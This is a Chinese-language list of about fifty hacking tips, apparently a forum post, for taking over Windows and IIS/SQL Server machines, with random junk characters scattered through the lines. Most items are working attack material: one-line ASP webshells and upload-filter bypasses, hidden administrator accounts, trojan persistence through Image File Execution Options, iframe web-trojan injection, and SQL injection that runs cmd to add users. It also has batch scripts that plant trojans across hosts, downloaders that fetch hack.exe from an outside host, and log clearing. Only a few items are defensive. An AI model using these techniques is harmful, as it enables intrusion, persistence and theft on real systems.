Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
* ?- ^) d6 f* w9 k0 A7 E$ mcacls C:\windows\system32 /G hqw20:R
8 u: z6 @7 b% C. i思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
; c( G( {, P7 u v( @, U恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
7 f6 l' P' P& U) q1 h" e" o9 Q1 j) k2 S- ^
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
) U6 d" E( o$ |; Z: ~
. Y% N6 d: J5 Y# b0 {. s3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。; x: j9 W. B0 o' V+ R0 F# h" J! x
/ J8 s4 f. B3 q6 M, z0 u4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号" n x& F% h8 |- v; E! J. y! `
0 ]( O8 G) v% g% {9 Z
5、利用INF文件来修改注册表4 A H6 Y) H% \" N
[Version]$ V V3 N7 W3 m3 ?& W
Signature="$CHICAGO$"4 V( Y& q# l# Z; e# ^3 m( h' r
[Defaultinstall]
1 d- D% W; ~5 yaddREG=Ating
/ g. [# x5 m0 ^3 e1 Z8 [[Ating]. U" h% \, R5 r/ L+ m) |
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
9 H- F; K) o. ^7 X以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:. `$ ~( N2 ~, R; o( r4 K- j
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径+ v( |! h1 h- l( C
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
- z w2 v: k$ f9 N; H5 HHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU/ o6 n' v# u2 D. f7 m
HKEY_CURRENT_CONFIG 简写为 HKCC
$ u S2 J" c4 l+ O0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值; c4 a- ]1 q7 M/ b1 r4 e
"1"这里代表是写入或删除注册表键值中的具体数据/ L x2 i" B$ ^0 p o: C
. e" w! |* W5 X5 [
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,# M, ?0 @- z; a6 R* B
多了一步就是在防火墙里添加个端口,然后导出其键值3 L h9 \1 ?$ s2 a4 g2 o
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]- [5 u3 i; s& ]( `6 e5 Q( M
/ @5 A" R# I$ a# H; [% @6 M7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
8 {. | w) X7 O* K- t7 e* Q- q在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。5 M8 ?) _ k. S4 Z
( Y/ l( ^8 Q9 }( `% b& q
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。 Z9 f1 C* S9 E% `
0 K! G9 Q0 P/ J/ ^* q& d N# v9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,. J; c% {) U" _ N) Z% ]
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。; Q2 K% t& l# v
9 h' {" I( w2 X9 h( o' }10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”( v! k3 g8 o. s, ]0 n! {- i1 z: v
1 M. v/ Q" k' U) J) r; g
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,8 |# L+ G2 q0 }- n- y! K
用法:xsniff –pass –hide –log pass.txt3 ~, s+ g$ H E- R" a2 m/ U5 \
* L# x4 c$ m# P' \8 t# @# B12、google搜索的艺术
8 m$ U# K# h4 B% ]: b搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
/ j/ q# S' g4 {& {8 a5 L4 K+ E2 o- ~或“字符串的语法错误”可以找到很多sql注入漏洞。
1 [- o0 K- B4 w" S; F- P* x
) Y5 y7 H. k6 W13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
+ J$ ]) B7 a5 }/ \; t
, z( r4 Q% u% v8 R4 b% v14、cmd中输入 nc –vv –l –p 19876 n# ^7 }1 A4 m1 j: C' k4 h' t
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃6 T. _+ g# N- p4 E1 h
" U7 {+ ~0 m" e$ P4 A ?1 S
15、制作T++木马,先写个ating.hta文件,内容为
% Y5 ~6 k2 M) ^5 W) K2 G1 n<script language="VBScript">
$ A" \2 B5 p& C; f) \5 hset wshshell=createobject ("wscript.shell" ): u2 K9 Z/ g3 U/ y& \% [" l; v/ H
a=wshshell.run("你马的名称",1)
8 E r. w: c9 ]window.close1 X/ m/ T) `, z3 j; P$ ]+ z: l) s
</script>
% h, y F7 Y2 t; ^再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
: T- B2 ~- k5 t o2 @# Z$ _
+ K. T5 M5 w$ ?# N8 H16、搜索栏里输入3 h; \3 ]" ]4 A" l0 I$ g; G* e
关键字%'and 1=1 and '%'='
% X0 J7 s) u% D* ]1 q关键字%'and 1=2 and '%'='1 b0 C7 S3 c5 S0 @$ {6 U
比较不同处 可以作为注入的特征字符; @: \8 z" N n Q
! R/ T v/ p9 T# V% n: {) n/ s4 x$ R
17、挂马代码<html>4 E/ z0 i/ {# {! t
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>6 r5 T. }0 S& Z9 o* T9 r
</html>. t8 V. u( k/ s d* D
/ ^( N" e8 |8 I- |- P0 `3 \. c
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,0 M$ u$ _ h U
net localgroup administrators还是可以看出Guest是管理员来。
1 U/ g# a# q7 N+ V! @
9 W- G a8 j# w5 |; F19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等 \5 Y% i0 H) i7 S w
用法: 安装: instsrv.exe 服务名称 路径7 `' e& ~7 o& g& U _
卸载: instsrv.exe 服务名称 REMOVE
8 q% t( K% T7 n: u z0 v% p. l$ H. c0 k0 b4 v
" `+ O" E. Z) q0 S& g9 X( u21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉3 ~; p' e" q7 m1 B2 k+ \2 W z
不能注入时要第一时间想到%5c暴库。
6 _: O; L% g7 |6 J. z, a
, e9 W% T1 _& c- q3 _" v22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~$ v6 V5 e/ H3 p A0 z* g' ?8 a
1 p7 [3 |4 t1 O& R& ?
23、缺少xp_cmdshell时
% q) y1 J* k- ?+ n9 G3 r" v尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
0 O' X4 V: T6 X) H3 Z假如恢复不成功,可以尝试直接加用户(针对开3389的)
' u/ {& ?' k) V9 n8 o z5 S: ?declare @o int
1 P! o. v G5 d& y5 E1 ~2 dexec sp_oacreate 'wscript.shell',@o out
6 R0 k* v2 z) K l0 \0 Q/ Fexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员+ M% U" M+ x6 V7 |# M, s
9 M! T/ z; }7 v24.批量种植木马.bat1 u+ h& W7 p2 Y
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中# T$ k# Y& f5 W0 x, J
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
8 w8 B# p; I. j扫描地址.txt里每个主机名一行 用\\开头- y( Z" T) Y% K( {. f: ?/ g$ ?
. i# h6 k: U, V6 k- l
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
! L& w3 y; y" |* h+ |( P9 @5 A# M S8 U! b! e: @
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
7 X4 D. W' f9 R3 M* @# t3 N( Q; v z将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.% S! F8 }& p, v) A
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马3 M& E5 ~" I9 A% _7 w, W
$ c. S( e. [6 X# R
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP8 [0 w* L# u: J( O& p9 C
然后用#clear logg和#clear line vty *删除日志/ h# {6 j9 s9 }' N0 L
6 H2 r; T3 M! D) ^28、电脑坏了省去重新安装系统的方法. Q9 t! }1 V& b/ g" c
纯dos下执行,6 z/ U r+ }: T" G# G9 U
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
9 A6 P3 x" Z, f/ k1 X0 U* W2 ]2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config. ] i8 Z# t6 s/ ^
- w+ _4 q+ a& A) g) u6 l29、解决TCP/IP筛选 在注册表里有三处,分别是:
8 t' q# d7 |0 Z+ h, K; R" xHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
- Y6 i! } H4 O$ ^HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
& ~3 ]4 Y" r. M: AHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& d' w' \, t+ K& H分别用1 u, \2 V, H. c, A1 s
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% T5 K( I* Y: Lregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip: @. n- P9 W: O. }
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip- c- @" I7 L2 o( n$ B& G# b! v; ]
命令来导出注册表项 B' j: v, @5 a! b, {: M0 h
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
) ^" G: \7 y5 N9 o* [$ v) v改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
2 y. V' U S9 u0 u$ t3 S; [ Eregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
( I. y% v2 v; }& X
' @- z- ?& ?8 ~0 Z; U30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U- D: e9 Y: m6 i: y8 j u" b* P
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
4 |$ ?0 W4 j( v- B" ]0 E) r0 u, o2 ^) c3 J5 d& H0 ]
31、全手工打造开3389工具
% y) u/ V7 F# P, g# J& u打开记事本,编辑内容如下:
" K! Y- w5 B# J2 L0 R, X. y2 kecho [Components] > c:\sql) D+ g; \2 k; E$ V1 f u: V
echo TSEnable = on >> c:\sql
" R9 O; j8 C# S* }9 Nsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q+ `( H4 i2 R* q
编辑好后存为BAT文件,上传至肉鸡,执行; U& {+ c h5 K& ?1 }. M5 u
. |3 ^/ l" f! R32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马8 A f$ L% [# I: P0 @
% w* [8 a* Y. {" W& n
33、让服务器重启
; d$ a6 U/ ~, R; B$ ` N9 X1 C9 l1 K写个bat死循环:
+ Z+ Y" G* ~/ N3 m0 R@echo off
- ?% p+ a/ S, _6 `:loop19 B! t9 d2 R3 L, F# `, S
cls
- A O/ I) U, `" J) V$ h0 Gstart cmd.exe/ x. f$ K' J; X0 w0 C" g: e
goto loop11 J# f9 E9 |! R+ y7 {
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启' L+ [( }* m. l
! I+ N) p9 ~" B5 Z1 I34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
2 w2 Q% F; o2 V( S# ~5 N@echo off
! Q* g Y4 l. w9 adate /t >c:/3389.txt% }. D4 R" s& z `0 c$ |! m' P U
time /t >>c:/3389.txt% d! `# m; z" z- o9 y4 e6 i4 \
attrib +s +h c:/3389.bat' I, J, e+ q% P3 o8 ~& D
attrib +s +h c:/3389.txt
* }0 [0 M; e9 pnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
% s9 [0 S8 F2 H; e, D. N8 M$ z并保存为3389.bat0 {& O2 G* Y1 p& R, {4 @
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号- ^7 q" T# R! S4 d
+ g* L( `$ v4 z9 H& D1 i35、有时候提不了权限的话,试试这个命令,在命令行里输入:7 N- m2 W0 W3 `, r5 h1 J
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)( g" Q6 o! D5 z6 ?2 ?' J7 o
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
( ]1 i) T8 Q u; @
2 p o; F* q) L3 b% W36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
8 P/ @1 t' A% L! x# D/ c. s% l4 `echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址: B& q2 j, w; I: j) p
echo 你的FTP账号 >>c:\1.bat //输入账号" k7 l. l0 ] c( z" b: B
echo 你的FTP密码 >>c:\1.bat //输入密码- W2 y# c: F8 O# c2 e4 Q
echo bin >>c:\1.bat //登入2 d# q+ h9 `; I; b& s
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么) b6 p$ L/ M1 f5 H/ c
echo bye >>c:\1.bat //退出
: v/ ^, a* {1 g& D然后执行ftp -s:c:\1.bat即可; x5 _5 V p) L5 O2 ^* X
9 E) T4 |7 ]0 ~+ s! E( l$ \37、修改注册表开3389两法
' P+ }' y" o3 W(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表& `+ {8 E$ k( \! y) I& Q
echo Windows Registry Editor Version 5.00 >>3389.reg! G* @; c9 |: s' \
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
" q7 d- N2 z7 x; Lecho "Enabled"="0" >>3389.reg
2 }* W3 h1 G' j8 h3 B' k" X, mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows% c" @3 v% \7 G0 Y' M9 c7 N
NT\CurrentVersion\Winlogon] >>3389.reg, H8 m4 F) M" e- G7 V; t& @
echo "ShutdownWithoutLogon"="0" >>3389.reg# j, s7 w$ E Z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]9 L+ l) @: v$ n& d
>>3389.reg# p: |8 p' y4 h) Q" o l& a
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
0 e: N3 c. e1 ]- O" N7 Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
O* t# j+ Q- A>>3389.reg
e3 U+ ]# I9 ` lecho "TSEnabled"=dword:00000001 >>3389.reg" Q2 x7 S% i4 {5 k5 c9 t% d% \& n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
! f' x5 y7 C$ O6 L4 [echo "Start"=dword:00000002 >>3389.reg
6 @1 Y4 z/ P1 ~8 Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]5 H# `' L) b( ^& P
>>3389.reg
+ w0 A! e t3 ^- L* uecho "Start"=dword:00000002 >>3389.reg4 o7 K2 n: y) v/ |
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg0 t8 D0 u+ F' \. \
echo "Hotkey"="1" >>3389.reg
9 h4 _: T" q9 z$ K4 m- s' h8 x/ G7 Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 V& `( X% E/ E1 X" qServer\Wds\rdpwd\Tds\tcp] >>3389.reg. l/ o: I$ U2 m0 X3 H" r" {
echo "PortNumber"=dword:00000D3D >>3389.reg
% d: Y9 n* q( L2 O) w$ uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% W4 O# r: l. T" jServer\WinStations\RDP-Tcp] >>3389.reg+ [, ]' `: f, ^) \! A4 i: s
echo "PortNumber"=dword:00000D3D >>3389.reg! |' a1 C- N& U: B
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
4 M' r/ [) Z# d C(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)+ m5 S) n7 d) R& k% Y" N8 S, I
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
x" `" X$ S; R$ j(2)winxp和win2003终端开启/ [. a0 v, I8 s ^+ Y1 D
用以下ECHO代码写一个REG文件:
# W7 i% u$ T! A7 b; _. ?5 Jecho Windows Registry Editor Version 5.00>>3389.reg# f/ J/ C, u, f+ \4 G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
c, B2 Z+ k+ O5 \; X7 ~1 @9 ZServer]>>3389.reg$ ]. P3 F* S$ H
echo "fDenyTSConnections"=dword:00000000>>3389.reg
% L! f$ a1 t9 N3 `# Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal L: q/ K' e; x' G* `1 H. P
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
- ?2 c, v* h; C9 Cecho "PortNumber"=dword:00000d3d>>3389.reg& a! h" V& m1 t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal$ U6 T: @% ~% k7 {/ ?
Server\WinStations\RDP-Tcp]>>3389.reg
$ w) X. w' R, u- P9 d% x0 u: @echo "PortNumber"=dword:00000d3d>>3389.reg
$ @/ L) t/ B, L* b8 x2 _然后regedit /s 3389.reg del 3389.reg3 z. K' D+ _: }$ B: h( W
XP下不论开终端还是改终端端口都不需重启
6 z% o2 }4 K6 ]
/ W C. q( Y5 ^! d" |2 T* p6 F. x38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
0 x- C/ h2 _ B# ^用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'2 }/ D, V4 z ? N G( l" D
7 b( r7 H: S# Q) M+ j& W" F
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
7 ^: G' G) ?( @1 c2 A5 p: N(1)数据库文件名应复杂并要有特殊字符
" @. h* F4 S4 ]3 f* k: m(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
4 f& e9 y" R3 V将conn.asp文档中的
3 x0 d) _ u/ M4 n! O7 m7 DDBPath = Server.MapPath("数据库.mdb")3 r: ?9 Q% p. a
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath1 i9 g3 S* I, Y5 c5 O6 V, E# p
9 u& S; W" | F* ^. G
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
) T/ z% }1 T* |" e: O% @(3)不放在WEB目录里* N0 v5 |+ j5 C5 B! L
$ I9 I2 i9 O& k9 f40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉7 x2 M$ L( o0 C. p7 e8 G0 i' \
可以写两个bat文件$ \* p2 @- d% H6 [
@echo off6 U+ h: N' R5 ^* q
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe5 p( h! M- I( Q- O7 w7 f; N
@del c:\winnt\system32\query.exe
$ P. u8 a. w6 Q! i9 y@del %SYSTEMROOT%\system32\dllcache\query.exe. W v; J- p/ T5 q
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的& b$ \0 }7 J# K5 @/ I8 ]
. w; h$ w# U) {! O8 h [. O@echo off
) X% B) p! S& l. E@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
|* s! P/ g$ b3 |7 T@del c:\winnt\system32\tsadmin.exe
( Q" C8 q4 `3 O5 V, \2 `5 a" G7 T@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
7 E( z7 ]; J4 L$ a! ?( s. o2 J P: Y' ~5 D) \ ~& }# K1 L
41、映射对方盘符
" j5 e/ ]4 u8 Atelnet到他的机器上,
. c7 `4 l) V7 q3 L& |net share 查看有没有默认共享 如果没有,那么就接着运行
* B9 T4 `- z Snet share c$=c:
' B- [/ i! d3 E; U- M& q8 h, v. inet share现在有c$9 O I6 _3 `* n: ~ o
在自己的机器上运行
) X1 {- c f' W8 G6 K9 Jnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K2 m5 a7 K) K) r/ V: ~( G. C7 e& ]
1 B9 P# T6 ?! |; ^6 I! E( ]42、一些很有用的老知识: Q0 S" s. q; X" G% |+ J
type c:\boot.ini ( 查看系统版本 )
: I& t5 q5 G1 s1 k# O+ Qnet start (查看已经启动的服务)
" E4 O! y# m) T! I4 M& {& Pquery user ( 查看当前终端连接 ), N" ^; P5 y9 R0 O, \
net user ( 查看当前用户 )
" n* @! U5 |9 E+ x0 Knet user 用户 密码/add ( 建立账号 )+ p% ~" K6 [# F% i
net localgroup administrators 用户 /add (提升某用户为管理员)5 B- ^! @1 A- G( Y Z! o
ipconfig -all ( 查看IP什么的 )
% Q9 @! K4 u% l# jnetstat -an ( 查看当前网络状态 )
0 J" {/ O& \, B! X# gfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码); A$ s$ Y& Z2 v6 o9 @! u
克隆时Administrator对应1F4% J, `4 ?8 M9 ?) f/ F
guest对应1F51 M4 {* r. x1 p* _3 z
tsinternetuser对应3E85 d! M, f" _0 h. {. I( J* w0 H9 k
6 P# n5 W8 J0 b' Y43、如果对方没开3389,但是装了Remote Administrator Service
6 e. Q( M( B9 }1 L用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接! f# T$ R, O6 Q3 z) o; X& H
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息" S, P6 l# @* X% L
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
) T& y6 ?# z3 `; E8 i/ E$ X) m3 O
' L2 u2 y! w) j6 t* _. M44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)& L' }1 C* g( C
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
$ h) K, h7 \# h" v( @( D. s4 `& W7 k/ V$ s4 q# H
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
8 @8 V1 \& D5 c) {6 pecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open( z+ s& _+ a) U6 I! N T9 n! x. \0 t) L
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =% U9 K& T1 Y: A
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
/ r& I3 U. S4 U: E: m1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
& P+ E/ d0 H! A& C( h(这是完整的一句话,其中没有换行符)
3 S' V6 R' M2 \9 d; M! M, W然后下载:
3 G8 @) O5 C& e$ kcscript down.vbs http://www.hack520.org/hack.exe hack.exe
! k8 _1 f: I. e6 j! |) t
" `/ e# z/ a, Y( V46、一句话木马成功依赖于两个条件:. F1 l3 S+ s; R" |
1、服务端没有禁止adodb.Stream或FSO组件3 d9 R0 r) S7 Y8 C" |2 N
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。8 G/ h$ n I% i. S2 R
( Z1 {3 r$ d' E3 s% i47、利用DB_OWNER权限进行手工备份一句话木马的代码:
" }& u0 o" M# q* M6 d1 ]; T;alter database utsz set RECOVERY FULL--
" W: R5 ^5 ^( o;create table cmd (a image)--
' w/ h# Q' V) _# y, f) S8 D;backup log utsz to disk = 'D:\cmd' with init--
: L/ _, c5 t5 |, W;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--! U( O2 U8 [. v1 B# z
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
) ^$ @8 P% q [( g7 ~: t注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
; O# }9 m" R7 m. Q T' ~* @. r5 f1 g9 E1 w. V
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" G/ H3 y& a5 t0 J. _) {1 a& [& Q- p! e1 h
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options" f4 k# @' K3 ]8 }1 a: `8 x- n
所有会话用 'all'。9 V( D/ U, R- l* R8 f
-s sessionid 列出会话的信息。
% }5 q6 v" y) T/ b+ f, _1 {-k sessionid 终止会话。
1 M/ O0 E4 e2 w% x& G$ e2 z4 [7 \+ X+ t-m sessionid 发送消息到会话。
3 M+ F9 D) F* H! R" h: {! l; A
/ x0 R) H5 O4 K* cconfig 配置 telnet 服务器参数。) _9 l, h* }5 k/ O( _9 g& y4 A
4 w' K# y1 S) d/ Kcommon_options 为:; f' V5 a- ^, c& k% |
-u user 指定要使用其凭据的用户
G/ B0 j6 s2 y% M! S; t& h" ~( e-p password 用户密码) b8 X3 G7 u7 v$ A
6 F& L; G. r/ M8 Hconfig_options 为:
( `# r" r7 d Z Q4 M& m. ldom = domain 设定用户的默认域% U4 G7 H) [+ x# \& S
ctrlakeymap = yes|no 设定 ALT 键的映射
3 _% e# @- M" J1 L9 xtimeout = hh:mm:ss 设定空闲会话超时值7 u) p. ^8 U8 ?' M% t2 g) ^
timeoutactive = yes|no 启用空闲会话。
$ L8 s9 Z' z" n3 ]' |maxfail = attempts 设定断开前失败的登录企图数。
/ A( u- P- h8 v4 q5 Emaxconn = connections 设定最大连接数。6 ], C9 I/ X- C4 N! M% n
port = number 设定 telnet 端口。
# C9 V. {2 y& M5 h" h; ?sec = [+/-]NTLM [+/-]passwd) e; V0 R5 W" x1 J: J6 c
设定身份验证机构
. y. @: Z# P, S5 v) y; N, C, ~ \5 ffname = file 指定审计文件名。% y4 V/ S* x9 J9 C; u7 a
fsize = size 指定审计文件的最大尺寸(MB)。7 f; H5 ?: i% X+ {; M! |
mode = console|stream 指定操作模式。
$ P u) }5 g; z. t# Y9 s9 t: xauditlocation = eventlog|file|both7 p2 B& Y5 V( {# R, x
指定记录地点
( m! S' r! l0 s6 a" haudit = [+/-]user [+/-]fail [+/-]admin1 X' Y1 H/ E! I" L0 G
6 U s8 { G& ^1 u6 z8 {% f" P49、例如:在IE上访问:
) L6 v' G$ b- ^www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
7 q9 D* t/ V; D: X- R/ rhack.txt里面的代码是:
# H' B0 i% J4 e' A! `<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">, }5 C: `/ z1 E4 @9 i8 e0 V
把这个hack.txt发到你空间就可以了!& A6 H. R1 w+ N [, R' n0 g
这个可以利用来做网马哦!
v) V: }% K% v% M
, n4 X2 L: X1 D4 O( ~$ W50、autorun的病毒可以通过手动限制!' n, K9 O! @) N8 u& c# G. R
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
' z4 h9 l" @: h! P2,打开盘符用右键打开!切忌双击盘符~7 N) ^& a. u; D5 P+ @5 w! I$ ^5 s7 p
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
7 h% O& ^) K% v- C! @9 g# L$ B) b9 }- `7 a) @" [
51、log备份时的一句话木马:
8 X6 m( R; @3 J( K: ya).<%%25Execute(request("go"))%%25>( \0 K8 q) Z9 G( l5 p; W
b).<%Execute(request("go"))%>
E, M. m N; Y3 D# R; X& s+ o8 vc).%><%execute request("go")%><%
9 [7 Q* K* l* Z& J6 m. z, v1 |d).<script language=VBScript runat=server>execute request("sb")</Script>
" G8 Z. {( |3 t, _% {/ ^# Je).<%25Execute(request("l"))%25>
' K& }9 s+ W9 u4 } X) of).<%if request("cmd")<>"" then execute request("pass")%>9 w" X& K t1 T- E
/ w/ [0 h" \/ Y# q52、at "12:17" /interactive cmd
) T. k; c' ~6 [3 x执行后可以用AT命令查看新加的任务8 |! L M+ _$ T9 G1 F# d. b& b
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。+ N# X! R, ]" W; F6 @! J& W2 N
5 c" y) L" Q7 F
53、隐藏ASP后门的两种方法+ f5 [4 O) V. J
1、建立非标准目录:mkdir images..\! V @- o/ \' Z( M' }
